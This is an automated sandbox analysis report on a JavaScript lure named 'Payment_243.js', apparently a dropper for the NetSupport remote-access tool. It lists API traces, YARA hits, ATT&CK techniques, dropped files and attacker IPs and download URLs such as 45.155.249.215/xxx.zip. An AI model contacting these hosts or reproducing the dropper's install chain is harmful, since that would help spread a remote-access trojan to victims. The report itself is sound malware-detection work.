                                Source: client32.exe, client32.exe, 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000006.00000002.530108204.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000008.00000002.547693910.0000000011194000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: Shell_TrayWnd
                                Source: client32.exe, client32.exe, 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000006.00000002.530108204.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000008.00000002.547693910.0000000011194000.00000002.00000001.01000000.00000009.sdmpBinary or memory string: Progman
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_11174B29
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,4_2_11174BCC
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: GetLocaleInfoA,4_2_1116C24E
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,4_2_11174796
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,4_2_111746A1
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,4_2_1117483D
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,4_2_11174898
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,4_2_11174B90
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,4_2_11174A69
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: GetLocaleInfoW,free,_calloc_crt,strncpy_s,GetLocaleInfoW,GetLocaleInfoW,_calloc_crt,GetLocaleInfoW,GetLastError,_calloc_crt,free,free,__invoke_watson,6_2_6A0F888A
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,6_2_6A0F86E3
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,WideCharToMultiByte,_freea_s,malloc,6_2_6A0F871C
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: _getptd,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_itoa_s,__fassign,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,strcpy_s,__invoke_watson,6_2_6A0F8468
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: GetLocaleInfoW,strcmp,strcmp,GetLocaleInfoW,atol,GetACP,6_2_6A0F85AC
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: GetLocaleInfoA,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,_errno,6_2_6A0F65F0
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: _getptd,_LcidFromHexString,GetLocaleInfoA,_stricmp,_stricmp,_TestDefaultLanguage,6_2_6A16F307
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,6_2_6A16F3C7
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: _getptd,_LcidFromHexString,GetLocaleInfoA,_stricmp,6_2_6A16F034
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,6_2_6A16F0DB
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: _getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,_stricmp,GetLocaleInfoA,_stricmp,_strnicmp,_strlen,GetLocaleInfoA,_stricmp,_strlen,_stricmp,_TestDefaultLanguage,6_2_6A16F136
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,6_2_6A16F42E
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\x225qa0.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\x225qa0.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\x225qa0.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\x225qa0.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\x225qa0.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\x225qa0.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\x225qa0.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\x225qa0.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\x225qa0.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\x225qa0.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\x225qa0.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\x225qa0.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\x225qa0.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\x225qa0.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\x225qa0.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\x225qa0.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\x225qa0.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\x225qa0.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\x225qa0.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\x225qa0.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\x225qa0.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\x225qa0.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\x225qa0.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\x225qa0.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\x225qa0.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\x225qa0.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\x225qa0.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\x225qa0.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\x225qa0.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\x225qa0.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\x225qa0.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\x225qa0.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\x225qa0.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\x225qa0.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\x225qa0.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\x225qa0.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\x225qa0.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\x225qa0.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\x225qa0.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\x225qa0.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\x225qa0.zip VolumeInformationJump to behavior
                                Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ProgramData\x225qa0.zip VolumeInformationJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_110F37A0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree,4_2_110F37A0
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_11134830 GetLocalTime,LoadLibraryA,GetCurrentProcess,GetProcAddress,GetProcAddress,GetProcessHandleCount,SetLastError,GetProcAddress,GetProcAddress,SetLastError,SetLastError,GetProcAddress,K32GetProcessMemoryInfo,SetLastError,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,4_2_11134830
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_1103BA70 SHGetFolderPathA,GetUserNameA,DeleteFileA,_sprintf,_fputs,_free,GetFileAttributesA,SetFileAttributesA,4_2_1103BA70
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_1117594C __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,4_2_1117594C
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_11146010 _memset,GetVersionExA,LoadLibraryA,GetProcAddress,FreeLibrary,GetSystemDefaultLangID,4_2_11146010
                                Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 4_2_11070430 CapiHangup,CapiClose,CapiOpen,CapiListen,GetTickCount,GetTickCount,GetTickCount,CapiHangup,Sleep,GetTickCount,Sleep,4_2_11070430
                                Source: C:\ProgramData\x225qa0\client32.exeCode function: 6_2_71662710 CapiListen,memset,6_2_71662710
                                Source: Yara matchFile source: 6.2.client32.exe.73620000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 8.2.client32.exe.71660000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.client32.exe.aa0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.0.client32.exe.aa0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.client32.exe.aa0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.client32.exe.71660000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 8.2.client32.exe.73620000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 8.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.client32.exe.71660000.5.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.client32.exe.73620000.6.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 8.2.client32.exe.aa0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.client32.exe.111b8c68.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.0.client32.exe.aa0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 8.0.client32.exe.aa0000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.client32.exe.715d0000.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 6.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 4.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 8.2.client32.exe.11000000.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000006.00000000.529790878.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.670588209.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000000.516821762.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.530116570.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000008.00000002.547582545.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.530048197.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.670615184.000000000201E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000008.00000000.547201521.0000000000AA2000.00000002.00000001.01000000.00000008.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000006.00000002.530108204.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000008.00000002.547693910.0000000011194000.00000002.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000008.00000002.547708086.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000004.00000002.671102639.0000000071610000.00000002.00000001.01000000.0000000D.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 3748, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 3908, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: client32.exe PID: 3992, type: MEMORYSTR
                                Source: Yara matchFile source: C:\ProgramData\x225qa0\client32.exe, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\x225qa0\pcicapi.dll, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\x225qa0\PCICHEK.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\x225qa0\HTCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\x225qa0\TCCTL32.DLL, type: DROPPED
                                Source: Yara matchFile source: C:\ProgramData\x225qa0\PCICL32.DLL, type: DROPPED
                                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                                Gather Victim Identity Information22
                                Scripting
                                2
                                Valid Accounts
                                1
                                Windows Management Instrumentation
                                22
                                Scripting
                                1
                                DLL Side-Loading
                                2
                                Disable or Modify Tools
                                1
                                Input Capture
                                2
                                System Time Discovery
                                Remote Services1
                                Archive Collected Data
                                5
                                Ingress Tool Transfer
                                Exfiltration Over Other Network Medium1
                                System Shutdown/Reboot
                                CredentialsDomainsDefault Accounts4
                                Native API
                                1
                                DLL Side-Loading
                                2
                                Valid Accounts
                                1
                                Deobfuscate/Decode Files or Information
                                LSASS Memory1
                                Account Discovery
                                Remote Desktop Protocol1
                                Screen Capture
                                22
                                Encrypted Channel
                                Exfiltration Over Bluetooth1
                                Defacement
                                Email AddressesDNS ServerDomain Accounts1
                                Exploitation for Client Execution
                                2
                                Valid Accounts
                                21
                                Access Token Manipulation
                                5
                                Obfuscated Files or Information
                                Security Account Manager4
                                File and Directory Discovery
                                SMB/Windows Admin Shares1
                                Input Capture
                                5
                                Non-Application Layer Protocol
                                Automated ExfiltrationData Encrypted for Impact
                                Employee NamesVirtual Private ServerLocal Accounts2
                                Service Execution
                                1
                                Windows Service
                                1
                                Windows Service
                                1
                                Software Packing
                                NTDS37
                                System Information Discovery
                                Distributed Component Object Model3
                                Clipboard Data
                                16
                                Application Layer Protocol
                                Traffic DuplicationData Destruction
                                Gather Victim Network InformationServerCloud AccountsLaunchd1
                                Registry Run Keys / Startup Folder
                                113
                                Process Injection
                                1
                                DLL Side-Loading
                                LSA Secrets141
                                Security Software Discovery
                                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                                Registry Run Keys / Startup Folder
                                1
                                File Deletion
                                Cached Domain Credentials2
                                Virtualization/Sandbox Evasion
                                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                                Masquerading
                                DCSync1
                                Process Discovery
                                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                                Valid Accounts
                                Proc Filesystem11
                                Application Window Discovery
                                Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt2
                                Virtualization/Sandbox Evasion
                                /etc/passwd and /etc/shadow1
                                System Owner/User Discovery
                                Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron21
                                Access Token Manipulation
                                Network Sniffing1
                                Remote System Discovery
                                Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                                Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd113
                                Process Injection
                                Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                                Hide Legend

                                Legend:

                                • Process
                                • Signature
                                • Created File
                                • DNS/IP Info
                                • Is Dropped
                                • Is Windows Process
                                • Number of created Registry Values
                                • Number of created Files
                                • Visual Basic
                                • Delphi
                                • Java
                                • .Net C# or VB.NET
                                • C, C++ or other language
                                • Is malicious
                                • Internet
                                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1591022 Sample: Payment_243.js Startdate: 14/01/2025 Architecture: WINDOWS Score: 100 39 Suricata IDS alerts for network traffic 2->39 41 Multi AV Scanner detection for dropped file 2->41 43 JavaScript source code contains functionality to generate code involving HTTP requests or file downloads 2->43 45 3 other signatures 2->45 6 wscript.exe 1 48 2->6         started        11 client32.exe 2->11         started        13 client32.exe 2->13         started        process3 dnsIp4 27 45.155.249.215, 49165, 80 MEER-ASmeerfarbigGmbHCoKGDE Germany 6->27 19 C:\ProgramData\...\webmvorbisencoder.dll, PE32 6->19 dropped 21 C:\ProgramData\x225qa0\webmmux.dll, PE32 6->21 dropped 23 C:\ProgramData\x225qa0\remcmdstub.exe, PE32 6->23 dropped 25 8 other files (6 malicious) 6->25 dropped 47 System process connects to network (likely due to code injection or exploit) 6->47 49 Benign windows process drops PE files 6->49 51 Deletes itself after installation 6->51 53 Windows Scripting host queries suspicious COM object (likely to drop second stage) 6->53 15 client32.exe 15 6->15         started        file5 signatures6 process7 dnsIp8 29 185.157.213.71, 443, 49166 TVHORADADAES Spain 15->29 31 geo.netsupportsoftware.com 104.26.0.231, 49167, 49168, 49169 CLOUDFLARENETUS United States 15->31 33 Multi AV Scanner detection for dropped file 15->33 35 Contains functionalty to change the wallpaper 15->35 37 Delayed program exit found 15->37 signatures9

                                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                                windows-stand
                                SourceDetectionScannerLabelLink
                                Payment_243.js3%VirustotalBrowse
                                SourceDetectionScannerLabelLink
                                C:\ProgramData\x225qa0\HTCTL32.DLL16%ReversingLabsWin32.Trojan.Generic
                                C:\ProgramData\x225qa0\PCICHEK.DLL18%ReversingLabsWin32.Trojan.Generic
                                C:\ProgramData\x225qa0\PCICL32.DLL18%ReversingLabsWin32.Trojan.NetSupport
                                C:\ProgramData\x225qa0\TCCTL32.DLL5%ReversingLabs
                                C:\ProgramData\x225qa0\client32.exe32%ReversingLabsWin32.Trojan.NetSupport
                                C:\ProgramData\x225qa0\install\api-ms-win-core-localization-l1-2-0.dll0%ReversingLabs
                                C:\ProgramData\x225qa0\msvcr100.dll0%ReversingLabs
                                C:\ProgramData\x225qa0\pcicapi.dll16%ReversingLabsWin32.Trojan.Generic
                                C:\ProgramData\x225qa0\remcmdstub.exe29%ReversingLabsWin32.Trojan.Generic
                                C:\ProgramData\x225qa0\webmmux.dll0%ReversingLabs
                                C:\ProgramData\x225qa0\webmvorbisencoder.dll0%ReversingLabs
                                No Antivirus matches
                                No Antivirus matches
                                SourceDetectionScannerLabelLink
                                http://www.netsupportsoftware.com0%Avira URL Cloudsafe
                                http://0.30000000000000004.com/0%Avira URL Cloudsafe
                                http://%s/testpage.htm0%Avira URL Cloudsafe
                                https://jsbench.me/2vkpcekkvw/1)0%Avira URL Cloudsafe
                                http://%s/testpage.htmwininet.dll0%Avira URL Cloudsafe
                                http://127.0.0.1RESUMEPRINTING0%Avira URL Cloudsafe
                                http://www.pci.co.uk/supportsupport0%Avira URL Cloudsafe
                                http://www.pci.co.uk/support0%Avira URL Cloudsafe
                                http://45.155.249.215/xxx.zip?mt=63640%Avira URL Cloudsafe
                                http://%s/fakeurl.htm0%Avira URL Cloudsafe
                                http://185.157.213.71/fakeurl.htm0%Avira URL Cloudsafe
                                http://www.netsupportschool.com/tutor-assistant.asp11(L0%Avira URL Cloudsafe
                                https://tc39.github.io/ecma262/#sec-daylight-saving-time-adjustment).0%Avira URL Cloudsafe
                                http://www.netsupportschool.com/tutor-assistant.asp0%Avira URL Cloudsafe
                                NameIPActiveMaliciousAntivirus DetectionReputation
                                geo.netsupportsoftware.com
                                104.26.0.231
                                truefalse
                                  high
                                  NameMaliciousAntivirus DetectionReputation
                                  http://geo.netsupportsoftware.com/location/loca.aspfalse
                                    high
                                    http://45.155.249.215/xxx.zip?mt=6364true
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://185.157.213.71/fakeurl.htmtrue
                                    • Avira URL Cloud: safe
                                    unknown
                                    NameSourceMaliciousAntivirus DetectionReputation
                                    http://www.netsupportsoftware.comclient32.exe.0.drfalse
                                    • Avira URL Cloud: safe
                                    unknown
                                    http://www.apache.org/licenses/LICENSE-2.0Payment_243.jsfalse
                                      high
                                      http://www.pci.co.uk/supportclient32.exe, 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000006.00000002.530116570.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000008.00000002.547708086.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://%s/testpage.htmwininet.dllclient32.exe, 00000004.00000002.671102639.0000000071610000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.0.drfalse
                                      • Avira URL Cloud: safe
                                      unknown
                                      http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)client32.exe, 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000006.00000002.530108204.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000008.00000002.547693910.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.drfalse
                                        high
                                        http://www.pci.co.uk/supportsupportclient32.exe, 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000006.00000002.530116570.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000008.00000002.547708086.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.drfalse
                                        • Avira URL Cloud: safe
                                        unknown
                                        http://ocsp.thawte.com0client32.exe.0.drfalse
                                          high
                                          http://127.0.0.1RESUMEPRINTINGclient32.exe, 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000006.00000002.530108204.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000008.00000002.547693910.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.drfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://jsbench.me/2vkpcekkvw/1)Payment_243.jsfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://%s/testpage.htmclient32.exe, 00000004.00000002.671102639.0000000071610000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.0.drfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://0.30000000000000004.com/Payment_243.jsfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://127.0.0.1client32.exe, client32.exe, 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000006.00000002.530108204.0000000011194000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 00000008.00000002.547693910.0000000011194000.00000002.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.drfalse
                                            high
                                            http://www.symauth.com/cps0(HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.drfalse
                                              high
                                              https://momentjs.com/Payment_243.jsfalse
                                                high
                                                http://%s/fakeurl.htmclient32.exe, 00000004.00000002.671102639.0000000071610000.00000002.00000001.01000000.0000000D.sdmp, HTCTL32.DLL.0.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                http://geo.netsupportsoftware.com/location/loca.asp&client32.exe, 00000004.00000002.670510259.00000000004F7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  high
                                                  http://crl.thawte.com/ThawteTimestampingCA.crl0client32.exe.0.drfalse
                                                    high
                                                    https://developer.mozilla.org/en-US/docs/Web/API/CanvasRenderingContext2D/globalCompositeOperationPayment_243.jsfalse
                                                      high
                                                      https://www.thawte.com/cps0/webmvorbisencoder.dll.0.drfalse
                                                        high
                                                        http://www.symauth.com/rpa00HTCTL32.DLL.0.dr, pcicapi.dll.0.dr, remcmdstub.exe.0.drfalse
                                                          high
                                                          https://www.thawte.com/repository0Wwebmvorbisencoder.dll.0.drfalse
                                                            high
                                                            http://www.netsupportschool.com/tutor-assistant.asp11(Lclient32.exe, 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000006.00000002.530116570.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000008.00000002.547708086.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.drfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://github.com/ecomfe/zrender/blob/master/LICENSE.txtPayment_243.jsfalse
                                                              high
                                                              https://tc39.github.io/ecma262/#sec-daylight-saving-time-adjustment).Payment_243.jsfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.netsupportschool.com/tutor-assistant.aspclient32.exe, 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000006.00000002.530116570.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, client32.exe, 00000008.00000002.547708086.00000000111E2000.00000004.00000001.01000000.00000009.sdmp, PCICL32.DLL.0.drfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://github.com/d3/d3/blob/9cc9a875e636a1dcf36cc1e07bdf77e1ad6e2c74/src/arrays/quantile.jsPayment_243.jsfalse
                                                                high
                                                                • No. of IPs < 25%
                                                                • 25% < No. of IPs < 50%
